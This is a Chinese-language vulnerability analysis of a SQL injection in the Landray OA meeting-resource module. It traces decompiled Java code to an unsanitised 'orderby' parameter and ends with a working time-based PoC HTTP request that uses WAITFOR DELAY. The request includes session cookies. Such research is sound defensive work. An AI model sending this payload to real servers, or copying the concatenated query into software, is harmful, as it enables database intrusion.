蓝凌后台注入分析

前言

该漏洞是网上其他师傅挖掘的，主要是学习一下挖掘的思路。

 

漏洞分析

首先全局搜索jar包中的createSQLQuery方法，找到了很多，如下:

碰巧第一个类就是网上公开的注入点，KmImeetingResServiceImp是一个接口实现类，我们跟进去看一下：

public Page listUse(RequestContext requestContext) throws Exception {
    Page page = new Page();
    String s_pageno = requestContext.getParameter("pageno");
    String s_rowsize = requestContext.getParameter("rowsize");
    int pageno = 0;
    int rowsize = SysConfigParameters.getRowSize();
    if (s_pageno != null && s_pageno.length() > 0) {
        pageno = Integer.parseInt(s_pageno);
    }

    if (s_rowsize != null && s_rowsize.length() > 0) {
        rowsize = Integer.parseInt(s_rowsize);
    }

    int total = this.getListUseTotal(requestContext);
    if (total > 0) {
        page.setRowsize(rowsize);
        page.setPageno(pageno);
        page.setTotalrows(total);
        page.excecute();
        SQLQuery sqlQuery = this.getUseSQLQuery(requestContext);
        sqlQuery.setFirstResult(page.getStart());
        sqlQuery.setMaxResults(page.getRowsize());
        page.setList(sqlQuery.list());
    } else {
        page = Page.getEmptyPage();
    }

    return page;
}

21行调用同类下的getUseSQLQuery方法，跟入：

private SQLQuery getUseSQLQuery(RequestContext requestContext) {
    Map<String, Object> result = this.buidCondition(requestContext);
    String conditionStr = (String)result.get("conditionStr");
    Map<String, Object> params = (Map)result.get("params");
    String sql = "select * from ";
    sql = sql + "(select m.fd_id as fdId,ra.fd_name as fdPlace,m.fd_name as fdName ,m.fd_hold_date as fdHoldDate,m.fd_finish_date as fdFinishDate,pa.fd_name as personName,m.doc_status as docStatus,1 as isMeeting from km_imeeting_main m,sys_org_element pa,km_imeeting_res ra where m.doc_creator_id=pa.fd_id and m.fd_place_id=ra.fd_id and m.fd_place_id is not null  and m.doc_status<>'10' " + conditionStr.replaceAll("%use%", "m") + " union " + " select b.fd_id as fdId,rb.fd_name as fdPlace,b.fd_name as fdName,b.fd_hold_date as fdHoldDate,b.fd_finish_date as fdFinishDate,pb.fd_name as personName,'30' as docStatus,0 as isMeeting " + "from km_imeeting_book b,sys_org_element pb,km_imeeting_res rb where b.doc_creator_id=pb.fd_id and b.fd_place_id=rb.fd_id " + conditionStr.replaceAll("%use%", "b") + " ) total ";
    String orderby = requestContext.getParameter("orderby");
    String ordertype = requestContext.getParameter("ordertype");
    if (ordertype != null && ordertype.equalsIgnoreCase("down")) {
        orderby = orderby + " desc";
    }

    if (StringUtil.isNotNull(orderby)) {
        sql = sql + " order by " + orderby;
    } else {
        sql = sql + " order by fdHoldDate desc";
    }

    SQLQuery sqlQuery = this.getBaseDao().getHibernateSession().createSQLQuery(sql);
    if (!params.isEmpty()) {
        Iterator var10 = params.keySet().iterator();

        while(var10.hasNext()) {
            String key = (String)var10.next();
            sqlQuery.setParameter(key, params.get(key));
        }
    }

    sqlQuery.addScalar("fdId", Hibernate.STRING).addScalar("fdPlace", Hibernate.STRING).addScalar("fdName", Hibernate.STRING).addScalar("fdHoldDate", Hibernate.TIMESTAMP).addScalar("fdFinishDate", Hibernate.TIMESTAMP).addScalar("personName", Hibernate.STRING).addScalar("docStatus", Hibernate.STRING).addScalar("isMeeting", Hibernate.BOOLEAN);
    sqlQuery.setResultTransformer(Transformers.aliasToBean(KmImeetingUse.class));
    return sqlQuery;
}

该方法是一个private的方法，7行取得orderby的值，14行直接进行拼接查询导入注入的产生。

漏洞点找到了，接着是找到接口IKmImeetingResService

该接口下有listuse方法。

在KmImeetingResAction下的listuse方法的第六行发现触发了漏洞点

public ActionForward listUse(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response) throws Exception {
    TimeCounter.logCurrentTime("Action-listUse", true, this.getClass());
    KmssMessages messages = new KmssMessages();

    try {
        Page page = ((IKmImeetingResService)this.getServiceImp(request)).listUse(new RequestContext(request));
        request.setAttribute("queryPage", page);
    } catch (Exception var7) {
        messages.addError(var7);
    }

    TimeCounter.logCurrentTime("Action-listUse", false, this.getClass());
    if (messages.hasError()) {
        KmssReturnPage.getInstance(request).addMessages(messages).addButton(0).save(request);
        return this.getActionForward("failure", mapping, form, request, response);
    } else {
        String contentType = request.getParameter("contentType");
        return "json".equals(contentType) ? this.getActionForward("listUseData", mapping, form, request, response) : this.getActionForward("listUse", mapping, form, request, response);
    }
}

接着要找路由，找到了路由为：/km/imeeting/km_imeeting_res/kmImeetingRes

 

综上所述poc为：

POST /km/imeeting/km_imeeting_res/kmImeetingRes.do HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: JSESSIONID=7C9F86E2E9816C5162F52B4AB2C63FFF; LtpaToken=AAECAzYwRTVCRDgyNjBFNjY2NDJhZG1pboFkjfJS1t761TwfqohcECfzi8Ze
Content-Type: application/x-www-form-urlencoded
Content-Length: 92

contentType=json&method=listUse&orderby=1;WAITFOR DELAY '0:0:5'--&ordertype=down&s_ajax=true

成功延时5秒